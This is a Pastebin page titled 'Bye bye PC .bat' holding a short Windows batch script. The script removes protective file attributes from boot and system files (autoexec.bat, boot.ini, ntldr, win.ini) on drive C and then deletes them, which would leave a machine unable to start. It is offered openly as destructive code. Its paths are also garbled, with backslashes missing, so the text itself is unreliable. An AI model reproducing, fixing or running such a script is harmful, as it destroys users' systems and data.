Advertisement
JackHaxor

Bye bye PC .bat

May 14th, 2017
107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. @echo off
  2.  
  3. attrib -r -s -hc: autoexec.bat
  4.  
  5. del c: autoexec.bat
  6.  
  7. attrib -r -s -hc: boot.ini
  8.  
  9. del c: boot.ini
  10.  
  11. attrib -r -s -hc: ntldr
  12.  
  13. del c: ntldr
  14.  
  15. attrib -r -s -hc: windows win.ini
  16.  
  17. del c: windows win.ini
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement